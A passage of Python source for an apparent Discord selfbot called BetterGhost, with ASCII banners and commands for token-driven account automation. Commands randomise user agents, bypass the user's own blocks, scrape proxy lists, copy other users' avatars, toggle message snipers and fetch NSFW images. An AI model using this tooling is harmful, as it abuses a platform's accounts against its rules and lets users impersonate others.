print(' "Y8bbdP" '.center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
if consoleMode.lower() == "new4":
print("")
print(fg.consoleColour + "")
print(" ▄██████▄ ▄█ █▄ ▄██████▄ ▄████████ ███ ".center(width))
print(" ███ ███ ███ ███ ███ ███ ███ ███ ▀█████████▄ ".center(width))
print(" ███ █▀ ███ ███ ███ ███ ███ █▀ ▀███▀▀██ ".center(width))
print(" ▄███ ▄███▄▄▄▄███▄▄ ███ ███ ███ ███ ▀ ".center(width))
print('▀▀███ ████▄ ▀▀███▀▀▀▀███▀ ███ ███ ▀███████████ ███ '.center(width))
print(' ███ ███ ███ ███ ███ ███ ███ ███ '.center(width))
print(' ███ ███ ███ ███ ███ ███ ▄█ ███ ███ '.center(width))
print(' ████████▀ ███ █▀ ▀██████▀ ▄████████▀ ▄████▀ '.center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
if consoleMode.lower() == "bear":
if is_windows():
os.system("mode con: cols=90 lines=24")
print("")
print(fg.consoleColour + "")
print(" ▄▀▀▀▄▄▄▄▄▄▄▀▀▀▄ ".center(os.get_terminal_size().columns))
print(" █▒▒░░░░░░░░░▒▒█ ".center(os.get_terminal_size().columns))
print(" █░░█░░░░░█░░█ ".center(os.get_terminal_size().columns))
print(" ▄▄ █░░░▀█▀░░░█ ▄▄ ".center(os.get_terminal_size().columns))
print(" █░░█ ▀▄░░░░░░░▄▀ █░░█ ".center(os.get_terminal_size().columns))
print("█▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀█".center(os.get_terminal_size().columns))
print("█░█▀▀░░█ █░░█▀█░░█▀░░▀█▀░█".center(os.get_terminal_size().columns))
print("█░█▄█░░█▀█░░█▄█░░▄█░░ █ ░█".center(os.get_terminal_size().columns))
print("█▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄█".center(os.get_terminal_size().columns))
print("")
print(fg.cWhite + f"{motd}".center(os.get_terminal_size().columns))
print(fg.consoleColour + '─'*os.get_terminal_size().columns)
print("")
elif consoleMode.lower() == "old":
print("")
print(fg.consoleColour + "")
print(" ▄████ ██░ ██ ▒█████ ██████ ▄▄▄█████▓".center(width))
print(" ██▒ ▀█▒▓██░ ██▒▒██▒ ██▒▒██ ▒ ▓ ██▒ ▓▒".center(width))
print("▒██░▄▄▄░▒██▀▀██░▒██░ ██▒░ ▓██▄ ▒ ▓██░ ▒░".center(width))
print("░▓█ ██▓░▓█ ░██ ▒██ ██░ ▒ ██▒░ ▓██▓ ░ ".center(width))
print("░▒▓███▀▒░▓█▒░██▓░ ████▓▒░▒██████▒▒ ▒██▒ ░ ".center(width))
print(" ░▒ ▒ ▒ ░░▒░▒░ ▒░▒░▒░ ▒ ▒▓▒ ▒ ░ ▒ ░░ ".center(width))
print(" ░ ░ ▒ ░▒░ ░ ░ ▒ ▒░ ░ ░▒ ░ ░ ░ ".center(width))
print("░ ░ ░ ░ ░░ ░░ ░ ░ ▒ ░ ░ ░ ░ ".center(width))
print(" ░ ░ ░ ░ ░ ░ ░ ".center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
elif consoleMode not in consoleModes:
print("")
print(fg.consoleColour + "")
print(" ██████╗ ██╗ ██╗ ██████╗ ███████╗████████╗".center(width))
print("██╔════╝ ██║ ██║██╔═══██╗██╔════╝╚══██╔══╝".center(width))
print("██║ ███╗███████║██║ ██║███████╗ ██║ ".center(width))
print("██║ ██║██╔══██║██║ ██║╚════██║ ██║ ".center(width))
print("╚██████╔╝██║ ██║╚██████╔╝███████║ ██║ ".center(width))
print(" ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚══════╝ ╚═╝ ".center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
if consoleMode.lower() == "react":
print("")
print(fg.consoleColour + "")
print("██████╗ ███████╗ █████╗ ██████╗████████╗".center(width))
print("██╔══██╗██╔════╝██╔══██╗██╔════╝╚══██╔══╝".center(width))
print("██████╔╝█████╗ ███████║██║ ██║ ".center(width))
print("██╔══██╗██╔══╝ ██╔══██║██║ ██║ ".center(width))
print("██║ ██║███████╗██║ ██║╚██████╗ ██║ ".center(width))
print("╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚═╝ ".center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
if consoleMode.lower() == "rise":
print(fg.cBlue + "")
print("██████╗ ██╗███████╗███████╗ ███████╗███████╗██╗ ███████╗██████╗ ██████╗ ████████╗".center(width))
print("██╔══██╗██║██╔════╝██╔════╝ ██╔════╝██╔════╝██║ ██╔════╝██╔══██╗██╔═══██╗╚══██╔══╝".center(width))
print("██████╔╝██║███████╗█████╗ ███████╗█████╗ ██║ █████╗ ██████╔╝██║ ██║ ██║ ".center(width))
print("██╔══██╗██║╚════██║██╔══╝ ╚════██║██╔══╝ ██║ ██╔══╝ ██╔══██╗██║ ██║ ██║ ".center(width))
print("██║ ██║██║███████║███████╗ ███████║███████╗███████╗██║ ██████╔╝╚██████╔╝ ██║ ".center(width))
print("╚═╝ ╚═╝╚═╝╚══════╝╚══════╝ ╚══════╝╚══════╝╚══════╝╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ".center(width))
print("╭─━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━─╮")
print(fg.cGrey + f"Connected: {BetterGhost.user} | Prefix: {BetterGhost.command_prefix} | Servers: {len(BetterGhost.guilds)}".center(width))
print(fg.cBlue + "╰─━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━─╯")
print("")
print(fg.cBlue + '━'*width)
print("")
if consoleMode.lower() == "nighty":
if is_windows():
os.system("mode con: cols=90 lines=24")
print("")
print(f" {fg.cWhite}███{fg.consoleColour}╗ {fg.cWhite}██{fg.consoleColour}╗{fg.cWhite}██{fg.consoleColour}╗ {fg.cWhite}██████{fg.consoleColour}╗ {fg.cWhite}██{fg.consoleColour}╗ {fg.cWhite}██{fg.consoleColour}╗{fg.cWhite}████████{fg.consoleColour}╗{fg.cWhite}██{fg.consoleColour}╗ {fg.cWhite}██{fg.consoleColour}╗")
print(f" {fg.cWhite}████{fg.consoleColour}╗ {fg.cWhite}██{fg.consoleColour}║{fg.cWhite}██{fg.consoleColour}║{fg.cWhite}██{fg.consoleColour}╔════╝ {fg.cWhite}██{fg.consoleColour}║ {fg.cWhite}██{fg.consoleColour}║╚══{fg.cWhite}██{fg.consoleColour}╔══╝╚{fg.cWhite}██{fg.consoleColour}╗ {fg.cWhite}██{fg.consoleColour}╔╝")
print(f" {fg.cWhite}██{fg.consoleColour}╔{fg.cWhite}██{fg.consoleColour}╗ {fg.cWhite}██{fg.consoleColour}║{fg.cWhite}██{fg.consoleColour}║{fg.cWhite}██{fg.consoleColour}║ {fg.cWhite}███{fg.consoleColour}╗{fg.cWhite}███████{fg.consoleColour}║ {fg.cWhite}██{fg.consoleColour}║ ╚{fg.cWhite}████{fg.consoleColour}╔╝ ")
print(f" {fg.cWhite}██{fg.consoleColour}║╚{fg.cWhite}██{fg.consoleColour}╗{fg.cWhite}██{fg.consoleColour}║{fg.cWhite}██{fg.consoleColour}║{fg.cWhite}██{fg.consoleColour}║ {fg.cWhite}██{fg.consoleColour}║{fg.cWhite}██{fg.consoleColour}╔══{fg.cWhite}██{fg.consoleColour}║ {fg.cWhite}██{fg.consoleColour}║ ╚{fg.cWhite}██{fg.consoleColour}╔╝ ")
print(f" {fg.cWhite}██{fg.consoleColour}║ ╚{fg.cWhite}████{fg.consoleColour}║{fg.cWhite}██{fg.consoleColour}║╚{fg.cWhite}██████{fg.consoleColour}╔╝{fg.cWhite}██{fg.consoleColour}║ {fg.cWhite}██{fg.consoleColour}║ {fg.cWhite}██{fg.consoleColour}║ {fg.cWhite}██{fg.consoleColour}║ ")
print(fg.consoleColour + f" ╚═╝ ╚═══╝╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ")
print("")
print(f"{fg.cWhite}Status: {fg.cGreen}Connected")
print(f"{fg.cWhite}Account: {BetterGhost.user} [{len(BetterGhost.guilds)} servers] [{len(get_friends(__token__))} friends]")
print(f"{fg.cWhite}Prefix: {BetterGhost.command_prefix}")
print(fg.cWhite + '─'*os.get_terminal_size().columns)
# def getCurrentTime():
# return datetime.now().strftime("%H:%M")
# def print_important(message):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.cPurple}[Important] {fg.cGrey} | {message}")
# def print_info(message):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.cYellow}[Information] {fg.cGrey} | {message}")
# def print_cmd(command):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.consoleColour}[Command] {fg.cGrey} | {BetterGhost.command_prefix}{command}")
# def print_sharecmd(author, command):
# print(f"{fg.cGrey}[{getCurrentTime()}] {fg.consoleColour}[SHARE COMMAND] {fg.cWhite}({author}) {command}")
# def print_error(error):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.cRed}[Error] {fg.cGrey} | {error}")
# def print_detect(message):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.cPink}[Detect] {fg.cGrey} | {message}")
# def print_sniper(message):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.cOrange}[Sniper] {fg.cGrey} | {message}")
# def print_sniper_info(firstmessage, secondmessage):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.cOrange}[Sniper] {fg.cGrey} | {firstmessage} | {secondmessage}")
if "beta" in version.lower():
print_important("You're currently using a beta build of BetterGhost.")
print_important("If you notice any bugs please report them to the developer.")
print(" ")
elif "dev" in version.lower():
print_important("You're currently using a developer build of BetterGhost.")
print_important("If you notice any bugs please report them to the developer.")
print(" ")
@BetterGhost.command(name="blocksend", description="Send a message to a blocked user.", usage="blocksend [user id] [messages]", aliases=["sendblocked", "sendtoblocked"])
async def blocksend(ctx, userid:int, *, message):
user = await BetterGhost.fetch_user(userid)
await user.unblock()
await user.send(message)
await user.block()
if __embedmode__:
embed = discord.Embed(title=f"Block Send", description=f"Sent `{message}` to {user}.", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"Sent `{message}` to {user}.", delete_after=__deletetimeout__)
@BetterGhost.command(name="riskmode", description="Disable and enable risk mode", usage="riskmode")
async def riskmode(ctx):
global __riskmode__
riskModeText = ""
if __riskmode__:
__riskmode__ = False
cfg = Config.getConfig()
cfg["riskmode"] = False
Config.saveConfig(cfg)
riskModeText = "disabled"
else:
__riskmode__ = True
cfg = Config.getConfig()
cfg["riskmode"] = True
Config.saveConfig(cfg)
riskModeText = "enabled"
if __embedmode__:
embed = discord.Embed(description=f"Risk mode has been {riskModeText}.", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"Risk mode has been {riskModeText}.", delete_after=__deletetimeout__)
@BetterGhost.command(name="embedmode", description="Toggle embed mode.", usage="embedmode")
async def embedmode(ctx):
global __embedmode__
if not __embedmode__:
__embedmode__ = True
cfg = Config.getConfig()
cfg["embed_mode"] = True
Config.saveConfig(cfg)
if __embedmode__:
embed = discord.Embed(title=f"Embed mode has been enabled.", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Embed mode has been enabled.", delete_after=__deletetimeout__)
else:
if __embedmode__:
embed = discord.Embed(title=f"Embed mode is already enabled.", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Embed mode is already enabled.", delete_after=__deletetimeout__)
@BetterGhost.command(name="textmode", description="Toggle text mode.", usage="textmode")
async def textmode(ctx):
global __embedmode__
if __embedmode__:
__embedmode__ = False
cfg = Config.getConfig()
cfg["embed_mode"] = False
Config.saveConfig(cfg)
if __embedmode__:
embed = discord.Embed(title=f"Text mode has been enabled.", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Text mode has been enabled.", delete_after=__deletetimeout__)
else:
if __embedmode__:
embed = discord.Embed(title=f"Text mode is already enabled.", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Text mode is already enabled.", delete_after=__deletetimeout__)
@BetterGhost.command(name="readall", description="Mark every message as read.", usage="readall")
async def readall(ctx):
index = 0
index2 = 0
DiscumClient = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
for guild in BetterGhost.guilds:
messages2 = []
for channel in guild.text_channels:
index+=1
try:
messages = await channel.history(limit=1, oldest_first=False).flatten()
for message in messages:
index2+=1
messages2.append({"channel_id": str(channel.id), "message_id": str(message.id)})
print_info(f"({channel.name}) Fetched new messages to read.")
except:
pass
DiscumClient.bulkAck(messages2)
print_info(f"Read all messages in {guild.name}.")
print_info("All messages have been read.")
await ctx.send(f"Read a total of `{index}` channels and `{index2}` messages.")
@BetterGhost.command(name="specs", description="Your computers specifications.", usage="specs", aliases=["computerspecs", "pcspecs", "specifications"])
async def specs(ctx):
def get_size(bytes, suffix="B"):
factor = 1024
for unit in ["", "K", "M", "G", "T", "P"]:
if bytes < factor:
return f"{bytes:.2f}{unit}{suffix}"
bytes /= factor
uname = platform.uname()
svmem = psutil.virtual_memory()
system = uname.system
machine = uname.machine
cpu = platform.processor()
ram = str(get_size(svmem.used)) + "/" + str(get_size(svmem.total))
gpus = []
for gpu in GPUtil.getGPUs():
gpus.append(gpu.name)
if __embedmode__:
embed = discord.Embed(title="Specifications", color=__embedcolour__)
embed.add_field(name="System", value=f"```{system}```")
embed.add_field(name="Machine", value=f"```{machine}```")
embed.add_field(name="RAM", value=f"```{ram}```")
embed.add_field(name="CPU", value=f"```{cpu}```")
embed.add_field(name="GPUs", value=f"```{', '.join(gpus)}```")
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_thumbnail(url=__embedimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Specifications ]
System: {system}
Machine: {machine}
CPU: {cpu}
GPUs: {', '.join(gpus)}
RAM: {ram}
# {__embedfooter__}
```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="crypto", description="Get the current data on a cryptocurrency.", usage="crypto [currency]", aliases=["cryptodata"])
async def crypto(ctx, *, currency="bitcoin"):
request = requests.get(f"https://api.coingecko.com/api/v3/coins/{currency}")
if request.status_code == 200:
request = request.json()
if __embedmode__:
embed = discord.Embed(title=f"{request['name']} Data", color=__embedcolour__)
embed.add_field(name="Scores", value=f"""```
Coingecko score: {request['coingecko_score']}
Liquidity score: {request['liquidity_score']}
Developer score: {request['developer_score']}
Commuinity score: {request['community_score']}
```""", inline=False)
embed.add_field(name="Current Prices", value=f"""```
USD: {'{:,}'.format(request['market_data']['current_price']['usd'])}
CAD: {'{:,}'.format(request['market_data']['current_price']['cad'])}
AUD: {'{:,}'.format(request['market_data']['current_price']['aud'])}
GBP: {'{:,}'.format(request['market_data']['current_price']['gbp'])}
EUR: {'{:,}'.format(request['market_data']['current_price']['eur'])}
```""", inline=False)
embed.add_field(name="Last 24h Price Change", value=f"""```
USD: {'{:,}'.format(request['market_data']['price_change_24h_in_currency']['usd'])}
CAD: {'{:,}'.format(request['market_data']['price_change_24h_in_currency']['cad'])}
AUD: {'{:,}'.format(request['market_data']['price_change_24h_in_currency']['aud'])}
GBP: {'{:,}'.format(request['market_data']['price_change_24h_in_currency']['gbp'])}
EUR: {'{:,}'.format(request['market_data']['price_change_24h_in_currency']['eur'])}
```""", inline=False)
embed.set_thumbnail(url=request["image"]["large"])
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"""```ini
[ {request['name']} Data ]
[Scores]
Coingecko score: {request['coingecko_score']}
Liquidity score: {request['liquidity_score']}
Developer score: {request['developer_score']}
Commuinity score: {request['community_score']}
[Current Prices]
USD: {'{:,}'.format(request['market_data']['current_price']['usd'])}
CAD: {'{:,}'.format(request['market_data']['current_price']['cad'])}
AUD: {'{:,}'.format(request['market_data']['current_price']['aud'])}
GBP: {'{:,}'.format(request['market_data']['current_price']['gbp'])}
EUR: {'{:,}'.format(request['market_data']['current_price']['eur'])}
[Last 24h Price Change]
USD: {'{:,}'.format(request['market_data']['price_change_24h_in_currency']['usd'])}
CAD: {'{:,}'.format(request['market_data']['price_change_24h_in_currency']['cad'])}
AUD: {'{:,}'.format(request['market_data']['price_change_24h_in_currency']['aud'])}
GBP: {'{:,}'.format(request['market_data']['price_change_24h_in_currency']['gbp'])}
EUR: {'{:,}'.format(request['market_data']['price_change_24h_in_currency']['eur'])}
# {__embedfooter__}
```""")
else:
if __embedmode__:
embed = discord.Embed(title="Invalid Crypto", description="That crypto currency doesnt exist or there was an error.", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"""```ini
[ Invalid Crypto ]
That crypto currency doesnt exist or there was an error.
# {__embedfooter__}
```""")
@BetterGhost.command(name="proxies", description="Scrape an type of proxy.", usage="proxies [http, https, socks4, socks5, all]", aliases=["proxygen", "genproxies"])
async def proxies(ctx, type):
if type == "http":
if not os.path.isdir("data/proxies/"): os.makedirs("data/proxies/");
file = open("data/proxies/http.txt", "a+")
request = requests.get("https://api.proxyscrape.com/?request=displayproxies&proxytype=http&timeout=5000")
proxies = []
for proxy in request.text.split("\n"):
proxy = proxy.strip()
if proxy:
proxies.append(proxy)
file.write(str(proxy)+"\n")
file.close()
await ctx.send(content=f"Scraped `{len(proxies)}` HTTP proxies.", file=discord.File("data/proxies/http.txt"))
if type == "https":
if not os.path.isdir("data/proxies/"): os.makedirs("data/proxies/");
file = open("data/proxies/https.txt", "a+")
request = requests.get("https://api.proxyscrape.com/?request=displayproxies&proxytype=https&timeout=5000")
proxies = []
for proxy in request.text.split("\n"):
proxy = proxy.strip()
if proxy:
proxies.append(proxy)
file.write(str(proxy)+"\n")
file.close()
await ctx.send(content=f"Scraped `{len(proxies)}` HTTPS proxies.", file=discord.File("data/proxies/https.txt"))
if type == "socks4":
if not os.path.isdir("data/proxies/"): os.makedirs("data/proxies/");
file = open("data/proxies/socks4.txt", "a+")
request = requests.get("https://api.proxyscrape.com/?request=displayproxies&proxytype=socks4&timeout=5000")
proxies = []
for proxy in request.text.split("\n"):
proxy = proxy.strip()
if proxy:
proxies.append(proxy)
file.write(str(proxy)+"\n")
file.close()
await ctx.send(content=f"Scraped `{len(proxies)}` SOCKS4 proxies.", file=discord.File("data/proxies/socks4.txt"))
if type == "socks5":
if not os.path.isdir("data/proxies/"): os.makedirs("data/proxies/");
file = open("data/proxies/socks5.txt", "a+")
request = requests.get("https://api.proxyscrape.com/?request=displayproxies&proxytype=socks5&timeout=5000")
proxies = []
for proxy in request.text.split("\n"):
proxy = proxy.strip()
if proxy:
proxies.append(proxy)
file.write(str(proxy)+"\n")
file.close()
await ctx.send(content=f"Scraped `{len(proxies)}` SOCKS5 proxies.", file=discord.File("data/proxies/socks5.txt"))
if type == "all":
if not os.path.isdir("data/proxies/"): os.makedirs("data/proxies/");
file = open("data/proxies/all.txt", "a+")
request = requests.get("https://api.proxyscrape.com/?request=displayproxies&proxytype=all&timeout=5000")
proxies = []
for proxy in request.text.split("\n"):
proxy = proxy.strip()
if proxy:
proxies.append(proxy)
file.write(str(proxy)+"\n")
file.close()
await ctx.send(content=f"Scraped `{len(proxies)}` HTTP, HTTPS, SOCKS4 AND SOCKS5 proxies.", file=discord.File("data/proxies/all.txt"))
@BetterGhost.command(name="stealpfp", description="Set someones avatar as your avatar.", usage="stealpfp [@user]", aliases=["stealavatar"])
async def stealpfp(ctx, user:discord.User):
DiscumClient = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
avatar1 = user.avatar
extension = str(avatar1)[:-10][-3:]
open(f"data/pfpstealavatar.{extension}", "wb").write(requests.get(str(avatar1), allow_redirects=True).content)
DiscumClient.setAvatar(f"data/pfpstealavatar.{extension}")
await ctx.send(f"Stolen `{user}`'s avatar.", delete_after=__deletetimeout__)
# @BetterGhost.command(name="stealusername", description="Steal someones username.", usage="stealusername [@user]", aliases=["stealname"])
# async def stealusername(ctx, user:discord.User):
# DiscumClient = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
# username = user.name
# DiscumClient.setUsername(username)
# await ctx.send(f"Stolen `{user}`'s username.", delete_after=__deletetimeout__)
# @BetterGhost.command(name="stealprofile", description="Steal someones avatar and username.", usage="stealprofile [@user]")
# async def stealprofile(ctx, user:discord.User):
# DiscumClient = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
# avatar = user.avatar
# username = user.name
# extension = str(avatar)[:-10][-3:]
# open(f"data/pfpstealavatar.{extension}", "wb").write(requests.get(str(avatar), allow_redirects=True).content)
# DiscumClient.setAvatar(f"data/pfpstealavatar.{extension}")
# DiscumClient.setUsername(username)
@BetterGhost.command(name="cloneemoji", description="Clone an emoji to the command server.", usage="cloneemoji [emoji]", aliases=["stealemoji"])
async def cloneemoji(ctx, *, msg):
msg = re.sub("<:(.+):([0-9]+)>", "\\2", msg)
match = None
exact_match = False
for guild in BetterGhost.guilds:
for emoji in guild.emojis:
if msg.strip().lower() in str(emoji):
match = emoji
if msg.strip() in (str(emoji.id), emoji.name):
match = emoji
exact_match = True
break
if exact_match:
break
if not match:
return await ctx.send("Couldnt find that emoji.")
response = requests.get(match.url)
emoji = await ctx.guild.create_custom_emoji(name=match.name, image=response.content)
await ctx.send(f"Successfully cloned `{emoji.name}`.")
@BetterGhost.command(name="detections", description="A list of all detections.", usage="detections")
async def detections(ctx):
cfg = Config.getConfig()
_list = []
for key, value in cfg["detections"].items():
if __embedmode__:
_list.append(f"**{key}** : {value}")
else:
_list.append(f"{key} : {value}")
if __embedmode__:
embed = discord.Embed(title="Detections", description='\n'.join(_list), color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send("```ini\n[ Detections ]\n " + "\n".join(_list) + "\n\n# " + __embedfooter__ + "```")
@BetterGhost.command(name="snipers", description="A list of all snipers.", usage="snipers")
async def snipers(ctx):
cfg = Config.getConfig()
_list = []
for key, value in cfg["snipers"].items():
if __embedmode__:
_list.append(f"**{key}** : {value}")
else:
_list.append(f"{key} : {value}")
if __embedmode__:
embed = discord.Embed(title="Snipers", description='\n'.join(_list), color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send("```ini\n[ Snipers ]\n " + "\n".join(_list) + "\n\n# " + __embedfooter__ + "```")
@BetterGhost.command(name="enabledetect", description="Enable a detection.", usage="enabledetect [type]", aliases=["enabledetection", "enabledetections"])
async def enabledetect(ctx, *, type):
cfg = Config.getConfig()
success = False
for key, value in cfg["detections"].items():
if type.lower() == key.lower():
cfg["detections"][key] = True
Config.saveConfig(cfg)
success = True
if success:
await ctx.send(f"Enabled `{type}` detection.")
else:
await ctx.send(f"Couldnt find `{type}` detection.")
@BetterGhost.command(name="disabledetect", description="Disable a detection.", usage="disabledetect [type]", aliases=["disabledetection", "disabledetections"])
async def disabledetect(ctx, *, type):
cfg = Config.getConfig()
success = False
for key, value in cfg["detections"].items():
if type.lower() == key.lower():
cfg["detections"][key] = False
Config.saveConfig(cfg)
success = True
if success:
await ctx.send(f"Disabled `{type}` detection.")
else:
await ctx.send(f"Couldnt find `{type}` detection.")
@BetterGhost.command(name="enablesniper", description="Enable a sniper.", usage="enablesniper [type]", aliases=["enablesnipers"])
async def enablesniper(ctx, *, type):
cfg = Config.getConfig()
success = False
for key, value in cfg["snipers"].items():
if type.lower() == key.lower():
cfg["snipers"][key] = True
Config.saveConfig(cfg)
success = True
if success:
await ctx.send(f"Enabled `{type}` sniper.")
else:
await ctx.send(f"Couldnt find `{type}` sniper.")
@BetterGhost.command(name="disablesniper", description="Disable a sniper.", usage="disablesniper [type]", aliases=["disablesnipers"])
async def disablesniper(ctx, *, type):
cfg = Config.getConfig()
success = False
for key, value in cfg["snipers"].items():
if type.lower() == key.lower():
cfg["snipers"][key] = False
Config.saveConfig(cfg)
success = True
if success:
await ctx.send(f"Disabled `{type}` sniper.")
else:
await ctx.send(f"Couldnt find `{type}` sniper.")
# @BetterGhost.command(name="ghostusers", description="Finds all the people using BetterGhost in a server.", usage="ghostusers")
# @commands.guild_only()
# async def ghostusers(ctx):
# message = await ctx.send("Looking for people that have BetterGhost, this may take a while...")
# ghostUsers = []
# userAgent = get_random_user_agent()
# try:
# await ctx.message.delete()
# except:
# pass
# DiscumClient = discum.Client(token=__token__, user_agent=f"{userAgent}")
# @DiscumClient.gateway.command
# def getmembers(resp):
# guild_id = f'{ctx.guild.id}'
# channel_id = f'{ctx.channel.id}'
# if resp.event.ready_supplemental:
# DiscumClient.gateway.fetchMembers(guild_id, channel_id, wait=1)
# if DiscumClient.gateway.finishedMemberFetching(guild_id):
# DiscumClient.gateway.removeCommand(getmembers)
# DiscumClient.gateway.close()
# DiscumClient.gateway.run()
# for memberID in DiscumClient.gateway.session.guild(f'{ctx.guild.id}').members:
# member = await ctx.guild.fetch_member(int(memberID))
# ghostguild = await BetterGhost.fetch_guild(838869729829191681)
# mutualGuilds = member.mutual_guilds
# for guild in mutualGuilds:
# print(guild.name)
# DiscumClient.gateway.close()
# if __embedmode__:
# embed=discord.Embed(
# title="BetterGhost Users",
# description=f"There are a total of `{len(ghostUsers)}` BetterGhost users in `{ctx.guild.name}`\n \n```\n" + ", ".join(ghostUsers) + f"\n```",
# color=__embedcolour__
# )
# embed.set_thumbnail(url=__embedimage__)
# embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
# embed.timestamp = datetime.now()
# await message.edit(content="", embed=embed)
# else:
# await message.edit(content=f"""```ini
# [ BetterGhost Users ]
# There is a total of {len(ghostUsers)} in {ctx.guild.name}.
# {', '.join(ghostUsers)}
# # {__embedfooter__}
# ```""")
@BetterGhost.command(name="addccmd", description="Add a custom command.", usage="addccmd [name] [response]", aliases=["addcustomcommand"])
async def addccmd(ctx, name, *, response):
global ccmd
customCommands = json.load(open("customcommands.json"))
customCommands[name] = response
json.dump(customCommands, open("customcommands.json", "w"), indent=4, sort_keys=False)
ccmd = json.load(open("customcommands.json"))
await ctx.send(f"Added `{BetterGhost.command_prefix}{name}` to your custom commands.", delete_after=__deletetimeout__)
@BetterGhost.command(name="delccmd", description="Remove a custom command.", usage="delccmd [name]", aliases=["deletecustomcommand", "delcustomcommand", "removecustomcommand", "removeccmd", "deleteccmd"])
async def delccmd(ctx, name):
global ccmd
customCommands = json.load(open("customcommands.json"))
customCommands.pop(name)
json.dump(customCommands, open("customcommands.json", "w"), indent=4, sort_keys=False)
ccmd = json.load(open("customcommands.json"))
await ctx.send(f"Removed `{BetterGhost.command_prefix}{name}` from your custom commands", delete_after=__deletetimeout__)
@BetterGhost.command(name="boobs", description="Pictures or videos of boobs.", usage=f"boobs", aliases=["tits", "tit", "milkers", "titties", "boob"])
async def boobs(ctx):
type = "boobs"
image = get_nsfw(type)
if image.endswith("png") or image.endswith("jpeg") or image.endswith("jpg") or image.endswith("gif"):
embed = discord.Embed(title=f"{type}", color=__embedcolour__)
embed.set_image(url=image)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(image)
@BetterGhost.command(name="ass", description="Pictures or videos of ass.", usage=f"ass")
async def ass(ctx):
type = "ass"
image = get_nsfw(type)
if image.endswith("png") or image.endswith("jpeg") or image.endswith("jpg") or image.endswith("gif"):
if __embedmode__:
embed = discord.Embed(title=f"{type}", color=__embedcolour__)
embed.set_image(url=image)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(image)
else:
await ctx.send(image)
@BetterGhost.command(name="pussy", description="Pictures or videos of pussy.", usage=f"pussy")
async def pussy(ctx):
type = "pussy"
image = get_nsfw(type)
